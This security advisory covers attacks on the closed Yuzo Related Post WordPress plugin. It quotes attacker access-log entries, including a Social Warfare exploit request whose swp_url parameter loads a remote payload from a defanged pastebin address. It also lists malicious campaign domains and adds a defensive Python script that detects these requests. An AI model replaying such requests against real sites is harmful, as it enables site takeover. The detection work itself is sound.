
Attacks on closed WordPress plugins

The WordPress plugin repository team can close plugins and restrict downloads when they learn of a security issue that the developers cannot fix quickly.

However, bad actors actively monitor the WordPress plugin repository and pay close attention to these closed plugins. This can lead to massive attacks if the attacker can detect and exploit the vulnerability.

That is the case for the Yuzo Related Post plugin, version 5.12.91. It was closed on March 30 so that new users could not download it, but it had 60,000+ active installations the last time we looked.


Unfortunately, bad actors have started probing sites to check whether this plugin is installed:

140.143.195.86 - - [08/Apr/2019:22:56:29 +0000] "GET /wp-content/plugins/yuzo-related-post/assets/js/admin.js HTTP/1.1" - - "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"

Addition to an existing malicious campaign

We recently reported how attackers abused multiple plugins by injecting malicious scripts into them. Here is a typical, current example of how this malware campaign targets websites running a vulnerable Social Warfare plugin:

140.143.195.86 - - [08/Apr/2019:22:56:35 +0000] "GET /wp-admin/admin-ajax.php?swp_debug=load_options&swp_url=hxxps://pastebin[.]de/raw/HeKe9uqn HTTP/1.1" - 0 "-" "-"

We see that new domains are also used:

clevertrafficincome[.]com - Creation Date: 2019-04-05
Hellofromhony[.]org - Creation Date: 2019-04-09
notifymepush[.]info
Pushmeandtouchme[.]info

As the source IP address shows, this malware campaign has added the Yuzo Related Post plugin to its list of targets.
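One way to hunt for this activity in your own access logs, as an added example that is not part of the original article: it flags requests for the Yuzo plugin path and admin-ajax.php requests carrying the swp_debug or swp_url parameters, then groups the hits by source IP. It assumes combined-format logs; the rule names, function names and the two sample lines marked as constructed are illustrative.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Source IP and request target of a combined-format access log entry.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"')

def classify(target):
    """Return the rule names (labels invented for this example) a request matches."""
    path, _, query = target.partition("?")
    # Normalise case and repeated slashes so trivial variations still match.
    path = re.sub(r"/+", "/", path.lower())
    hits = set()
    if "/wp-content/plugins/yuzo-related-post/" in path:
        hits.add("yuzo-probe")
    if path.endswith("/wp-admin/admin-ajax.php"):
        params = parse_qs(query, keep_blank_values=True)
        if "swp_debug" in params or "swp_url" in params:
            hits.add("social-warfare-swp")
    return hits

def scan(lines):
    """Map each source IP to the set of rules its requests matched."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            seen[m["ip"]] |= classify(m["target"])
    return {ip: rules for ip, rules in seen.items() if rules}

def multi_target_sources(lines):
    """IPs that matched more than one rule, i.e. one source working through several plugins."""
    return sorted(ip for ip, rules in scan(lines).items() if len(rules) > 1)

SAMPLE = [
    # The two entries shown in the article (URL left defanged as published).
    '140.143.195.86 - - [08/Apr/2019:22:56:29 +0000] "GET /wp-content/plugins/yuzo-related-post/assets/js/admin.js HTTP/1.1" - - "-" "Mozilla/5.0"',
    '140.143.195.86 - - [08/Apr/2019:22:56:35 +0000] "GET /wp-admin/admin-ajax.php?swp_debug=load_options&swp_url=hxxps://pastebin[.]de/raw/HeKe9uqn HTTP/1.1" - 0 "-" "-"',
    # Constructed: a legitimate admin-ajax call that must not be flagged.
    '192.0.2.10 - - [08/Apr/2019:22:57:01 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 47 "-" "-"',
    # Constructed: a probe using mixed case and a doubled slash.
    '198.51.100.7 - - [08/Apr/2019:23:01:12 +0000] "GET //WP-Content/plugins/yuzo-related-post/readme.txt HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE).items():
        print(ip, sorted(rules))
    print("multiple targets:", multi_target_sources(SAMPLE))
```

A hit on "yuzo-probe" only shows that the path was requested; whether the site is exposed depends on whether the plugin is actually installed.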

Details of the vulnerability

Specifically, the Yuzo Related Post plugin has an unauthenticated cross-site scripting flaw. Several other vulnerabilities were also left unresolved, which was the main reason the WordPress team closed it.

In order to give users time to remove this plugin from their websites, we do not provide any further details here. Remember that attackers are already exploiting it.

Today, April 10, 2019, we are seeing many posts in the WordPress support forum about hacked sites that use the plugin. The plugin author even had to announce that the plugin should be uninstalled immediately.

Remove the Yuzo Related Post plugin immediately

If you cannot remove this plugin, we recommend adding a second layer of security that virtually patches vulnerabilities when developers do not fix the security issues.
